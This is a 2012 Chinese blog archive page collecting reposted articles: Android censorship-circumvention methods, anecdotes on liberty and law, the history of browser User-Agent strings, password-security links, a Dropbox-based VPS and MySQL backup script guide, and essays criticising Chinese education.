Pages

Thursday, 31 May 2012

万能在线转换服务:Online-ConVert.com

Online-convert是免费提供在线转换服务的网站,不同的是online-ConVert.com不单单只提供视频格式的转换,而且还支持音频、图像、文档、电子书等档案的格式转换,服务非常全面,该服务支持从本地上传文件,或者填入档案来源网址。
Online-convert主要的特点就是支持转换的文件类型足够多,值得收藏!
转换地址:http://www.online-convert.com

android手机翻墙方法

随着三大运营商大力推出“千元智能3G手机“,安卓平台迅速普及开来。在3G网络下,新闻、小说、音乐、视频逐个玩遍以后,就有了越狱的需求,想看看墙外的世界。与桌面平台越狱方案相比,移动终端(手机、平板等)受自身条件限制,解决方案并不完美。
众所周知,“伟大的墙”干扰网络的方法大体可以分为DNS干扰、IP封锁、TCP连接干扰、SSL干扰等。越狱方法虽然千差万别,但基本思路都是一 样:建立本地和国外服务器的加密通道,将本地的DNS查询连接,HTTP/HTTPS中转至国外服务器。对于DNS服务,除了加密中转通道,还需要设置正 确的DNS服务器(Google或OpenDNS)来解决DNS劫持问题。
从上面可以看到,利用国外服务器建立加密中转通道是翻墙的关键。TCP/IP连接是分层架构,因此较高层上的加密中转只能适应部分程序。 OpenVPN/L2TP/PPTP都是较低层面的加密连接,可以让所有的本地连接加密中转。SSH的Socket Proxy可以加密中转HTTP/HTTPS的接连。需要注意的是HTTP Proxy并不能处理FTP和HTTPS的中转。HTTPS的中转需要Socket Proxy来处理。
除了国外服务器,加密中转的另外一个问题就是如何将本地连接转发至加密通道上。OpenVPN/L2TP/PPTP在内核空间增加了一个 Network Adapter,所以只需要通过路由表就可以进行转发。对于HTTP/Socket Proxy通道,如果应用程序支持Proxy,则可以自动转发;反之则需要利用IPTables将HTTP/HTTPS连接通过 transparent SOCKS proxy转成Socket Proxy。
当加密中转连接到到服务器端时,还需要在服务器端做一些设置以便进行中转。openvpn/l2tp/pptp是通过iptables在内核实现转发。 ssh即可以利用-D选择转发socket,或者利用端口映射将socket转发至socket proxy或者http proxy。
l2tp和pptp是大多数android设备都默认支持的VPN。但很多router或者firewall不支持pptp,常常会遇见一些莫名其 妙的问题。openvpn需要android内核支持tun.ko模块。同时android还需要有binary openvpn application。整个安装过程较为复杂。为避免dns污染,还需要装一个改变dns的软件。
安卓平台常见越狱方案有:VPN;SSH-D;基于GAE的方案簇;基于PHP的方案。sshtunnel/gaeproxy是socket/http level的加密中转,因此需要利用到android中的iptable及相应的内核模块。
基于GAE的方案簇中,Opera Mini修改版与GAE中转服务器(Pyton或JAVA均可),但appspot.com被屏蔽后,

参考文章:Android翻墙总结 http://hongy19.blogspot.com/2012/03/android.html
实践参考文章:
[1]新版Opera Mini Android 7 修改服务器教程 http://jetzhang.com/archives/13
[2]GAE搭建Opera Mini代理服务器图文教程 http://www.zerotekblog.tk/?p=8014
------------------------------------------------------------------------------------------
 Android手机翻墙方法大全

一、GAE代理
GAEProxy是GAppProxy | WallProxy Android 客户端,综合 TransProxy、CMWRAP、SSHTunnel 和 Python For Android 等项目,以实现 Android 系统上基于 Google AppEngine 的 HTTP 代理。
http://igfw.tk/archives/2307、http://igfw.tk/archives/1839
二、SSH代理
SSH Tunnel和Connectbot都可以实现Android系统上SSH隧道翻墙。
http://igfw.tk/archives/1813、http://igfw.tk/archives/2115、http://igfw.tk/archives/2137
三、VPN代理
Android系统可以使用PPTP、 L2TP、 L2TP/IPSec PSK、OpenVPN等类型的VPN服务。
XinkVpnk是一个免费开源的实现一键连接/关闭VPN的桌面小工具(支持PPTP、 L2TP、L2TP/IPSec PSK,类似于1vpn)。
Android-OpenVPN-Settings可以方便的管理你的OpenVPN。
http://igfw.tk/archives/2160、http://igfw.tk/archives/2157
http://igfw.tk/archives/1651、http://igfw.tk/archives/1421
四、手机浏览器
由于手机性能及网络的限制手机浏览器厂商更趋向于服务器中转压缩数据来减少网络流 量提高浏览体验,这也就为使用手机浏览器翻墙埋下了伏笔,一般这种数据传 输是经过压缩的GFW不能直接检测传输内容,如果中转服务器在国外那它就能用来翻墙了,Opera Mini、UCWeb、 Skyfire、Ovi Browser都是这个道理!
http://igfw.tk/archives/2123
五、Tor代理
Tor已经支持Android系统了,不过连接也许还需要网桥代理。
http://igfw.tk/archives/1980
六、无界手机版
自由门和无界都出了Android系统版,可以试试。
http://igfw.tk/archives/1116
七、在线代理
在线代理(网页代理)适用于安卓手机手机,只要你的浏览器能浏览web网站一般都没问题,网页代理也很好找网络上可以搜索到很多(目前只有https的才有翻墙的保障了),Psiphon赛风也是一种在线代理用来手机翻墙也是一个不错的选择!
http://igfw.tk/archives/654、http://igfw.tk/archives/2217
八、翻墙路由器
如果你手机支持WiFi接入,你又有一个无线路由器(有无线网卡的笔记本也行),你可以设置你的路由器使用VPN翻墙,然后你手机连接你设置好的路由器上网使用自带浏览器就能翻墙了!
九、修改hosts
只适用于一些智能手机,只能实现特定被墙网站的访问(确切的说是就是还有没有被墙的 IP存在的网站)!
http://igfw.tk/archives/772
十、其他
知道的就分享嘛!
来源: http://www.androidsphere.net/2011/05/03/android-smartphone-fuck-gfw/
----------------------------------------------------------------
利用软件gaeproxy轻松实现android 一键翻墙

软件可以在任何一台已经越狱或者安装了新版busybox的手机上实现翻墙浏览,你需要下载软件,并且安装,然后打开代理开关,然后进行必要的配置,就可以了,你还可以进行设置哪些软件可以翻墙哪些软件不可以翻墙,速度很快,这是一款手机必备的翻墙软件!
注意事项:
1.有的用户想要升级,但是需要在未连接的状态下,在手机首页按菜单键,然后选择清除链接状态按钮,先清除过期的dns cache方可。
2. 没有 ROOT 权限或者 IPTABLES 模的用户,只能使用内置的代理浏览器,而不是使用你原本的浏览器。
3. 请大家看教程配置自己的服务器,内置的公用服务器每天只有1G的免费流量,在那么多人同事下载的情况下,随时都会超额!所以你直接翻墙连不上也是很正常的!
准备工作
1. 配置自己的 GoAgent Fetch Server ,详情请见:http://code.google.com/p/goagent/
2. 下载并安装 GAEProxy 最新的版本。
3. 第一次运行 GAEProxy 请按照提示进行设置,并确保在联网并插入SD卡的状态下勾选 “安装依赖模块” 。
4. 现阶段 GAEProxy 的运行依赖于 iptables ,并需要获得 ROOT 权限。
5. 勾选 “开启服务”,浏览互联网。
更多信息请见项目网站:http://gaeproxy.googlecode.com

让中国人猛醒的三个故事

第一个故事
清末,法国使臣罗杰斯对中国皇帝说:“你们的太监制度将健康人变成残疾,很不人道。”没等皇帝回话,贴身太监姚勋抢嘴道——“这是陛下的恩赐,奴才们心甘 情愿。怎可诋毁我大清国律,干涉我大清内政!? 评论:大清国人人有病。 什么病? 做了奴隶而不知道自己是奴隶,还以为自由着的病。 林语堂先生曾说过:“中国有一类人,身处社会最底层却有着统治阶级的思想。”

第二个故事
十八个世纪,德国皇帝威廉一世曾在波茨坦建立了一座行宫。一次,他住进了行宫,登高远眺波茨坦市的全景,但他的视线却被一座磨坊挡住了。皇帝大为扫兴。这 座磨坊“有碍观瞻”。他派人与磨坊主去协商,打算买下这座磨坊,以便拆除。不想,磨坊主坚决不卖,理由很简单:这是我祖上世代留下来的,不能败在我手里无 论多少钱都不卖!皇帝大怒,派出卫队,强行将磨房拆了。
倔犟的磨坊主向法院提起了诉讼。让人惊讶的是,法院居然判皇帝败诉。并判决皇帝在原地按原貌重建这座磨坊,并赔偿磨坊主的经济损失。皇帝服从地执行了法院的判决,重建了这座磨坊。
数十年后,威廉一世与磨坊主都相继去世。磨坊主的儿子因经营不善而濒临破产。他写信给当时的皇帝威廉二世,自愿将磨坊出卖给他。威廉二世接到这封信 后,感慨万千。他认为磨坊之事关系到国家的司法独立和审判公正的形象。它是一座丰碑,成为德国司法独立和裁判公正的象征,应当永远保留。便亲笔回信,劝其 保留这座磨坊,以传子孙。并赠给了他6000马克,以偿还其所欠债务。小磨坊主收到回信后,十分感动。决定不再出售这座磨坊,以铭记这段往事。
正如十八世纪中叶英国首相威廉·皮特所说:“即使是最穷的人,在他的小屋里也敢于对抗国王的权威。屋子可能很破旧,屋顶可能摇摇欲坠;但风能进,雨能进, 国王不能进,他的千军万马也不敢跨过这间破房子的门槛。 评论:人最自由、自主、安全和独立的时候是在被称为家的房子里,如果连这一栖身之地都不是自己所有的,人到哪里去寻求和确保自己的独立自主安全和幸福了? 财政权是其它权利的基础和保障,也是人类自由和尊严的根基。财政权使个人权利具体化,从而在根本上限制了政府对个人权利的侵犯。”

第三个故事
这个故事发生在柏林墙倒塌之后的德国。1991年9月,统一后的柏林法庭上,举世瞩目的柏林围墙守卫案将要开庭宣判。这次接受审判的是4个年轻人,30岁都不到,他们曾经是柏林墙的东德守卫。
两年前一个冬夜里,刚满20岁的克利斯和一个好朋友,名叫高定,一起偷偷攀爬柏林墙企图逃向自由。几声枪声响,一颗子弹由克利斯前胸穿入,高定的脚 踝被另一颗子弹击中。克利斯很快就断了气。他不知道,他是这堵墙下最后一个遇难者。那个射杀他的东德卫兵,叫英格·亨里奇。当然他也绝没想到,短短九个月 之后,围墙被柏林人推到,而自己最终会站在法庭上因为杀人罪而接受审判。
柏林法庭最终的判决是:判处开枪射杀克利斯的卫兵英格·亨里奇三年半徒刑,不予假释。他的律师辩称,他们仅仅是执行命令的人,根本没有选择的权利,罪不在 己。法官当庭指出:“东德的法律要你杀人,可是你明明知道这些唾弃共产党而逃亡的人是无辜的,明知他无辜而杀他,就是有罪。作为警察,不执行上级命令是有罪 的,但是打不准是无罪的。作为一个心智健全的人,此时此刻,你有把枪口抬高一厘米的自主权,这是你应主动承担的良心义务。 评论:在这个世界上,良知是最高的准则,是不允许用任何借口来无视的。”

UserAgent的历史变迁和浏览器的内核

最早的时候有一个浏览器叫NCSA Mosaic,把自己标称为NCSA_Mosaic/2.0 (Windows 3.1),它支持文字显示的同时还支持图片,于是Web开始好玩起来。
然后出现了一个新的网页浏览器,“Mozilla”,其实就是“Mosaic终结者”的意思,这搞的Mosaic很不爽,(毕竟Mosaic出道 早,江湖老),新浏览器最后正式公布的名称是Netscape,它把自己标称为Mozilla/1.0 (Win3.1),更好玩了。Netscape支持框架显示,后来框架在大家中间流行起来了,但Mosaic不支持框架啊,于是伟大的“用户代理人探测” 技术出现了,如果是“Mozilla”,那就发给支持框架的页面,至于其他的浏览器,则发给不含框架的页面。
Netscape想逗Microsoft玩儿,把Windows叫做“几乎不曾做过调试的设备驱动器”,后者很恼火。Microsoft于是推出了 自己的 网页浏览器,叫做Internet Explorer,希望它能成为“Netscape终结者”。Internet Explorer也支持框架,但它不是Mozilla啊,所以没人给它发送带有框架的页面。Microsoft慢慢烦躁起来,不再寄希望于网站管理员逐渐 认识IE并给它发框架,而是宣称自己是“兼容Mozilla”的,开始模仿Netscape,把自己标称为Mozilla/1.22 (compatible; MSIE 2.0; Windows 95),这样Internet Explorer也能收到框架了,整个Microsoft狂喜,但网站管理员开始有点被搞糊涂了。
Microsoft把IE和Windows一起卖,并且把产品也弄得比Netscape更好了,拉开了第一场浏览器之战。结果和大家知道的一 样,Netscape被干掉了,Microsoft大胜、大喜。但是后来Netscape以Mozilla的新名称重生了,构造了Gecko,标称其为 Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.1) Gecko/20020826,Gecko属于渲染引擎,表现优异。Mozilla开发了Firefox,标称为Mozilla/5.0 (Windows; U; Windows NT 5.1; sv-SE; rv:1.7.5) Gecko/20041108 Firefox/1.0,并且Firefox表现也非常优秀。Gecko扩张迅速,一些浏览器使用了它的代码并标称为Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.2) Gecko/20040825 Camino/0.8.1 ,这是一个,还有Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.8) Gecko/20071008 SeaMonkey/1.0,另一个,它们都伪装成Mozilla,同时也都是基于Gecko支持的。
Gecko表现优秀,IE则很差劲,于是身份甄别再次发生,输送给Gecko的是设计良好的网页代码,其他浏览器就没有这个待遇了。Linux的跟 随者很伤心,因为他们创建了基于KHTML引擎支持的Konqueror,但却不会被输送好代码,虽然他们自己认为KHTML和Gecko一样优秀,于是 Konquerer开始伪装自己“像Gecko”那样以得到好的网页,并标称自己为Mozilla/5.0 (compatible; Konqueror/3.2; FreeBSD) (KHTML, like Gecko),这个世界更让人困惑了.
后来出现了Opera这样的主儿,宣称“允许用户自己决定让浏览器装成谁”,它的菜单中提供了Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.51, Mozilla/5.0 (Windows NT 6.0; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51,Opera/9.51 (Windows NT 5.1; U; en) 供大家来选择,选谁是谁。
Apple开发了Safari,使用了KHTML,同时也增加了很多新特性,后来干脆一锅煮,另起炉灶叫了WebKit,但是它有希望能够得到那些 为KHTML编写的网页,于是Safari标称自己为Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.5,这个世界更混乱了。
Microsoft越来越担心Firefox的发展,重新启动了Internet Explorer的开发,标称自己为Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) ,可以很好的渲染代码,但那要看网站管理员是否指示它这么做。
Google也开发了自己的浏览器Chrome,使用了Webkit,有点像Safari,希望能得到为Safari编写的网页,于是决定装成 Safari。这样啊,Chrome使用了WebKit渲染引擎,想装成Safari,而WebKit呢又伪装自己是KHTML,KHTML呢又是伪装成 Gecko的,同时所有的浏览器又都宣称自己是Mozilla,于是,Chrome宣称自己是Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13,,UserAgent字符串彻底混乱了,也几乎不再发挥任何作用,每个人都宣称自己是别人,混乱充斥人间啊。
来源:http://article.yeeyan.org/view/heart5/19211 译言网

related post: http://briteming.blogspot.co.uk/2011/11/http.html

密码安全思考及解决方案

花蜜
http://flowerpassword.com/
花密 – 不一样的优秀密码管理解决方案,让每个网站使用不同密码也能轻松记忆!
http://www.iplaysoft.com/flowerpassword.html
1Password – 可能是目前最完美的跨平台账号密码管理工具 (高安全性/一键自动登录网站)
http://www.iplaysoft.com/1password.html
便于记忆与安全 网络密码如何兼顾?
http://www.cnbeta.com/articles/182213.htm
多图探析Symantec最新免费密码云服务Norton Identity Safe
http://www.cnbeta.com/articles/184184.htm
密码保卫战:长度至少大于6位 定期更换
密码:人类智力的终极对决
http://www.cnbeta.com/articles/174885.htm
CSDN泄漏数据完整分析
http://www.cnbeta.com/articles/166576.htm
CSDN数据库被爆 统计CSDN用户都喜欢哪些密码
http://www.cnbeta.com/articles/166527.htm
探讨:如何定制个人专属的高强度变量密码
http://www.cnbeta.com/articles/166780.htm
密码控晒稀奇密码大开眼界 文艺密码PK科学密码
http://www.cnbeta.com/articles/163461.htm
专家建议12位密码最合适
http://www.cnbeta.com/articles/163011.htm
最差劲的10个中国式密码
http://www.cnbeta.com/articles/162999.htm
2011年度10大最容易遭到破解的数字密码
http://www.cnbeta.com/articles/162889.htm
25 个最常用 & 最烂的密码
http://www.cnbeta.com/articles/162566.htm
魔高一丈 斯坦福团队破解文本形式验证码
http://www.cnbeta.com/articles/161149.htm
身体密码:确定唯一的你
http://www.cnbeta.com/articles/153080.htm
你的密码究竟有多安全?
http://www.cnbeta.com/articles/136524.htm
有时候,含有重复数字的密码更保险
http://www.cnbeta.com/articles/134100.htm
安全诚可贵 隐私价更高-密码设得好两者皆做到
http://www.cnbeta.com/articles/130384.htm
12位密码需17134年才能破解
http://www.cnbeta.com/articles/120112.htm

无线密码破解借GPU提速110倍
http://www.cnbeta.com/articles/74966.htm

报告称Adobe Reader成为2009漏洞之王
http://www.cnbeta.com/articles/105885.htm
Windows、Adobe Reader和Flash列去年漏洞影响程度前三
http://www.cnbeta.com/articles/109096.htm
黑帽大会:HTTPS和SSL存在安全漏洞
http://www.cnbeta.com/articles/118161.htm
加密传输不安全!最新的TLS/SSL3.0中间人攻击已公布
http://www.cnbeta.com/articles/97184.htm
三大主流下载软件安全漏洞频传
http://www.cnbeta.com/articles/101618.htm
如何安全逛淘宝,帮你挽回4.5万或许更多损失
http://www.cnbeta.com/articles/135897.htm
来源:cnBeta.COM 中文业界资讯站

用DropBox定时备份VPS上所建的网站的数据

这个备份方案是直接使用dropbox同步,如果想实时同步就一直守护dropbox进程,会占用一定资源.推荐小内存的VPS和我一样使用cron定时备份.

1.linux上安装dropbox:

32位linux:
wget -O dropbox.tar.gz http://www.dropbox.com/download?plat=lnx.x86
64位linux:
wget -O dropbox.tar.gz http://www.dropbox.com/download?plat=lnx.x86_64
解压:
tar xzvf dropbox.tar.gz
第一次运行生成host_id:
~/.dropbox-dist/dropboxd &
生成id后,将host_id替换下面链接后面的字符在浏览器打开,输入你的帐号密码就绑定机器了.
https://www.dropbox.com/cli_link?host_id=XXXXXXXXXXXXXXXXXXX

2.建立连接备份网站:

正式开始同步你的网站,通过ln软链接你所有要备份的目录,例如:
  • cd ~/Dropbox
  • ln -s /home/wwwroot/html
  • ln -s /home/wwwroot/htdocs
  • ...
开始运行同步,美国的vps同步速度非常快的,1G的html文件,只花了几分钟全部同步完成。
~/.dropbox-dist/dropboxd &

3.为了节省资源,可以不使用实时同步,只定时打开同步一天的文件再关掉以节省资源.

先关掉同步:
killall dropbox
编写定时同步脚本:
vi backup.sh
代码如下:
#!/bin/sh
start() {
echo starting dropbox
/root/.dropbox-dist/dropboxd &
}
stop() {
echo stoping dropbox
pkill dropbox
}
case “$1″ in
start)
start
;;
stop)
stop
;;
restart)
stop
start
;;
esac
定时运行和关闭:
chmod +x backup.sh
crontab -e
每天4点开始同步,5点关闭同步.
其实一般每天更新数据不多不用打开这么长时间,我自己用的一天只打开10分钟,这个根据各人每天更新的数据量自己来设置.
0 4 * * * sh /root/backup.sh restart
0 5 * * * sh /root/backup.sh stop

4.干脆把我从网上找的备份数据库的脚本一并贡献出来,适合懒人使用

vi bakmysql.sh
脚本如下:
#!/bin/bash
DBName=修改为数据库名
DBUser=修改为数据库用户名
DBPasswd=修改为数据库密码
BackupPath=/root/Dropbox/
LogFile=/root/db.log
DBPath=/usr/local/mysql/var/ #备份的数据库目录
#BackupMethod=mysqldump
#BackupMethod=mysqlhotcopy
#BackupMethod=tar
NewFile=”$BackupPath”db$(date +%y%m%d).tgz
DumpFile=”$BackupPath”db$(date +%y%m%d)
OldFile=”$BackupPath”db$(date +%y%m%d –date=’5 days ago’).tgz  #自动删除5天前的备份
echo “——————————————-” >> $LogFile
echo $(date +”%y-%m-%d %H:%M:%S”) >> $LogFile
echo “————————–” >> $LogFile
#Delete Old File
if [ -f $OldFile ]
then
rm -f $OldFile >> $LogFile 2>&1
echo “[$OldFile]Delete Old File Success!” >> $LogFile
else
echo “[$OldFile]No Old Backup File!” >> $LogFile
fi
if [ -f $NewFile ]
then
echo “[$NewFile]The Backup File is exists,Can’t Backup!” >> $LogFile
else
case $BackupMethod in
mysqldump)
if [ -z $DBPasswd ]
then
mysqldump -u $DBUser –opt $DBName > $DumpFile
else
mysqldump -u $DBUser -p$DBPasswd –opt $DBName > $DumpFile
fi
tar czvf $NewFile $DumpFile >> $LogFile 2>&1
echo “[$NewFile]Backup Success!” >> $LogFile
rm -rf $DumpFile
;;
mysqlhotcopy)
rm -rf $DumpFile
mkdir $DumpFile
if [ -z $DBPasswd ]
then
mysqlhotcopy -u $DBUser $DBName $DumpFile >> $LogFile 2>&1
else
mysqlhotcopy -u $DBUser -p $DBPasswd $DBName $DumpFile >>$LogFile 2>&1
fi
tar czvf $NewFile $DumpFile >> $LogFile 2>&1
echo “[$NewFile]Backup Success!” >> $LogFile
rm -rf $DumpFile
;;
*)
service mysql stop >/dev/null 2>&1
tar czvf $NewFile $DBPath$DBName >> $LogFile 2>&1
service mysql start >/dev/null 2>&1
echo “[$NewFile]Backup Success!” >> $LogFile
;;
esac
fi
echo “——————————————-” >> $LogFile

5.删除卸载dropbox方法:

killall dropbox
rm -rf .dropbox .dropbox-dist Dropbox dropbox.tar.gz dbmakefakelib.py dbreadconfig.py

类似twitter的服务:cuzo.com

我的cuzo地址:http://luckypoem.cuzo.com/,每发的tweet都有相应的超链,如
http://luckypoem.cuzo.com/twitter/
http://luckypoem.cuzo.com/i-use-cuzo-first-time-it-s-similar/

中国教育的绝境

如果要用一个词来描述中国的教育,那就是溃败。产业化教育将中国拖入一场马拉松式的赌局之中,被胁迫加入游戏的皆成输家,坐庄的席卷了所有的财富。
似乎有那么一个“老大哥”——英国作家奥尼尔在名著《1984》里塑造的“独裁统治者”,一直在盯着我们,全体国民都通过萤光屏幕处于其严密监控之下,无条件地服从其旨意。 “不过,他的角色已经变成了精明的商人”。(见6月12日出版的《南都周刊》)
以优质资源做诱饵的庄家,制定了一整套游戏规则,每一个环节皆明设或暗设机关,布下天罗地网,令参与者束手就擒。这与“老大哥”的控制手段如出一辙:单一的思维和需求导致单一的选择。
通过意识形态审查与控制,以及经济寻租的双重扼制,实现了教育的专制。人的教育死了,掠夺开始了。
在教育的名义下,搞定一切。所有的人都是人质和筹码。
求赢的目的论教育学与成功学,窒息了学子的心灵。他们大都丧失了学习的兴趣,以考分机器的面目度过人生最美好的年华。
父母们焦躁不安,倾注全力——精神和金钱,供养自己家庭以及家族的希望之芽。
全社会处于异常紧张的战争状态,为每年一次的中考、高考、考研考博而操劳。
每一个考生的亲人为争夺有限的资源而奔走于权柄之间,迁移落户,风餐露宿,寄居他人屋檐之下,早起晚睡,接送,辅导,训斥,牺牲节假日,放弃人生享受,为的只是后代完成跳龙门的壮举。设计复算计,没有心机的有了心机,有心机的成了人精。
在 貌似唯一公平的平台上,谁也不愿意先输一程。有钱没钱,都得咬紧牙关,走过这一伟大的长征。考上了名校,也只是稍稍松口气,还有找工作,买房子,婚嫁诸事 有待操劳。一代代就这样老了,没有人能看到苦难尽头那一抹曙光。有诗人在二十年前曾经感叹:为什么我看到的总是父亲的背影?
我们要走的是一个程序,一个只想采撷果实——毕业证的行为艺术。
对 绝大多数学生来说,他们从未完整地发育过,获得教育的滋养。无暇顾及自己身心的成长,鲜有时间培育自己的情感和想像力,从而确立安身立命的价值观。目标在 前,没有当下。教育把孩子与自己的生命割裂开,把他们与生活和广大的世界隔离开,他们在死寂的环境里“记住一切有可能在考试中出现的东西”(一个美国中学 生的话)。
中国丧失了自己的孩子。
他们不会犹疑、徘徊,父母包办设计好了他们可怜而伟大的一生。目标坚定——不是自己认可 的;全心全意——不需要操别的心,父母已经包办了他们的一切生活及生存杂事;唯我独尊——他们是家庭的核心,一颦一笑决定着家庭的气氛;冷漠世故,他们把 一切都看穿了,故此不再有发自内心的热情,世界与自己无关。他们是一座座孤岛,长夜难明。
作为起点的大学,成了终点。放松,放纵,他们要把十多年压抑的力比多发泄出来,要补偿自己。性与就业,主宰了校园生活,对真理和智慧的探究,在功利性的目标前,变得如此卑微。可悲的或许是,很多人从来就没有过求知的冲动,因为他们早就没有了那种本能。
对成功学的信奉者而言,时间是无用的东西,他们更愿意相信各种层出不穷的速成技巧,所以,在中国,教育常常就是骗子的产业。只要给出一个速成的目标,家长们很乐意掏瘪自己的钱包。
教育制造的灾难,正在由全社会来承受。
高考前夕,直接留学和弃考成为热点话题。“攀升的弃考率,反映的一个逻辑是——高等教育相对投资价值的下降。”第二十五期《了望东方周刊》的社评指出,中国高等教育替代品的出现和高等教育产品自身预期的下降,是两个主要原因。
高 教大跃进所制造的产品——毕业生,已经成为中国维稳的不稳定因素。从鼓励大学生做村官到鼓励参军,政府殚精竭虑。第二十一期《中国新闻周刊》以“新知青运 动”为题,介绍了几位大学生村官的现状,在精英匮乏的农村,他们未改变什么,却往往被改变着。一滴水撒进大地,孤独的是水。他们并不想把根扎在农村,那只 是人生的一个过渡,被动选择的他们,期待着服务期满后的工作前景。从2008年开始的十万大学生村官计划,显然需要面对庞大的就业缺口。“在行政资源有限 的背景下这样的出口能有多宽,未为可知。”持续增长的待业数量恐怕还需要相当长的时间来消化。问题是,支持大学生社会就业的政策,无意间在和农民工争夺饭 碗。中国社科院社会学所研究员唐钧专家对《新世纪周刊》记者说,参军这项缓兵之计堵死了农民的路子,把大学生当人才培养当农民工用,最后的结果就是“读书 无用论”观念的抬头。
灾难的源头在大学。第十三期《财经》杂志指出,大学生就业难根源在学校,因为他们不考虑社会需要:专业人数过多,专业 培养模式与市场需求严重脱节。“高等教育的定位与产业解构的需要错位”。在毛入学率高达22%的中国,学校家长和学生,依旧是原有的精英意识。“普通专科 学校也向培养高级人才的方向靠拢”。据统计,全国有326所学校设立经济学专业,510所设立法学专业。
1999年以来,本为延缓就业压力 而实行的缓兵之计——扩招,制造了巨大的教育泡沫,置师资和需求于不顾的高等教育大跃进,促使院校攀比式升级,一个专科院校短短数年就可以发展成为一所综 合性大学。专业同质化,教育过剩。师资不足,生源素质下降,专业设置脱离需要,在人保部劳动科学研究所主任张丽宾看来,这些因素造成“地方院校走出来的专 科学生成了真正就业困难的大学生”。
聪明人借助泡沫大发其财。以独立相标榜的大学排行榜就是一例。
6月22日出版的《时代周报》报导,身份不明的武书连收取多所高校“赞助费”,使其排序靠前。互相利用的结果,依据此民间排行榜选择学校的考生,掉进了谎言的陷阱。
在 我看来,第十七期《新世纪周刊》所作的“中国大学满意度排行榜”具有一定的说服力。这个由毕业生对母校打分所建立的排行,可以充当选择学校及专业考生的参 考。在今年的榜单上,上海交大独占鳌头,前十名中有六所出自长三角地区,记者分析乃是得力于该地更丰富的就业机会;高校扩张最疯狂的武汉,大学生总数已经 超过京沪两地,达百万之众,但签约率仅有两成,就业形势最为严峻。该榜最有吸引力的一个子榜或许是“工作收入薪酬排名”,名列前二十名的复旦等高校脸上有 光了。
大学资格争夺战丑闻迭出。继《中国青年报》揭露吉林松原高考疯狂作弊后,《了望东方周刊》记者深入采访,为我们细致描绘了一幅惊心动 魄的群丑图。当地的作弊,已经到了丧心病狂的程度,高考作弊公然以产业化的姿态挑战道德极限:从户口迁移、集体抄袭到使用高科技作弊器,一条龙服务迅捷便 利。监考形同虚设,教师参与贩卖作弊机,人们的羞耻感罪恶感荡然无存。他们唯一的集体快感或许是,以己之获利,鲸吞了属于他人的资源和未来。2008 年,该市600分以上的考生超过了该省两个大城市长春和吉林的总和。
诸多高考丑闻无一不在证明:大学资格成为掠夺最激烈的一块领地。原因在于,这是全社会能争夺的唯一一块公共资源。对每一个家庭而言,孩子是家庭的未来;对每一个学生来说,这是改变命运的天梯。
考 上大学之前的日子是可怕的。每一所学校几乎都类似于集中营。压抑的气氛令孩子们终生难忘。那种残酷是渗入骨髓的。第二十三期《新民周刊》报导了一个13岁 上海少女的自杀事件。精神折磨彻底击溃了一个少女。可怕的是,学生大都不愿作证,记者费尽周章才找到三个肯说话的学生,还原了那堂致命训话的核心。该不幸 事件的症结在于,升学指标造成教师心理失控,把压力转移到无辜的学生身上。处在压力和焦虑中的学生,恰似一座活火山,随时会喷薄而出。
在上中学之前,奥数与英语,犹如两条毒蛇,缠住了每一个家庭。追求智慧的东西变成了加分工具,机巧取代了对未知的探求;外语取代母语,成为荒诞而实用的敲门砖。
教育学者杨东平教授不明白,影响学生健康和家庭经济的坏事,为何就不能得到纠正呢?利益主体乃庞然大物,只有如此,他们才能保证其垄断收入。越大越急迫的问题,越会以不可思议的方式拖延下去。所有的人为灾难到最后都不会有真正的责任人。
这种教育走到自己的终点了吗?
敏锐的《新周刊》这次选对了题目:《无法成人——中国人的成长链》。作家胡小同不无讽刺地写道:求学越来越早,成家越来越晚,毕业越来越难找到工作。一切“为了孩子”的中国父母是中国孩子无法成人的根源。
缺乏生气的学生们的脸,焦虑而严酷的教师的脸,执著又茫然的父母的脸,为中国打上了难以轻松的底色。被讥讽为中国式母亲和中国式父亲的中国家长们,只有当你们走出了成功学的魔咒,游戏才或许可以终结。
让我们记住台湾大学校长的话:“大学是社会良心的最后堡垒”。 “学生具有良好的品性,社会的良心堡垒就更加坚固”。(见第十三期《南风窗》)

可怕的中小学教育和教育产业化

如果我开始就下断语——中国教育的产业化、市场化、商业化,多年后的今天,已被证明是完败的——恐怕 有些人会不同意。但只要不罔顾身边的残酷现实就不难发现,教育的商业化已令从幼儿园到大学的整个教育走向颓败。如果再不对这个教育体制(体系)进行彻底改 革,它已经并将继续对我们整个国家、民族造成深远而巨大的伤害,将无可弥补。
而贻祸之根,始于小学教育。
每年5、6月,是所有毕业班的家长们备受煎熬的时期。大学毕业的孩子,四处找工作;高三不用说了,高考在即;初三面临中考,小学六年级面临“小升初”。哪个家长不是战战兢兢?
其实,非独毕业班而然,家长们的焦虑,从选择哪所小学甚至幼儿园就开始了。我也是今年才知道,幼儿园已变得如此昂贵:一位朋友为其孩子读幼儿园居然交了5.2万元的赞助费。
国 人重视教育全世界恐无出其右,所以,上学都奔重点学校。其简单逻辑是:上了重点小学,考上重点初中的概率更高,上了重点初中考上重点高中的概率更高,上了 重点高中考上重点大学的概率更高。倒过来的逻辑也一样。局外人会说:当年我们上的是普通中小学,不也考上重点大学了么?但说这话的人想必还没有做家长,至 少是没做到小学毕业班的家长。否则,临事他同样慌张。
6月份过去了,北京有些一年级新生的家长仍未“搞定”孩子就读的学校。一位家长托人交给校长10万元,得以跨区就读某重点小学;另一位家长举着10多万元想进某重点小学,却找不着门道,急得团团转。
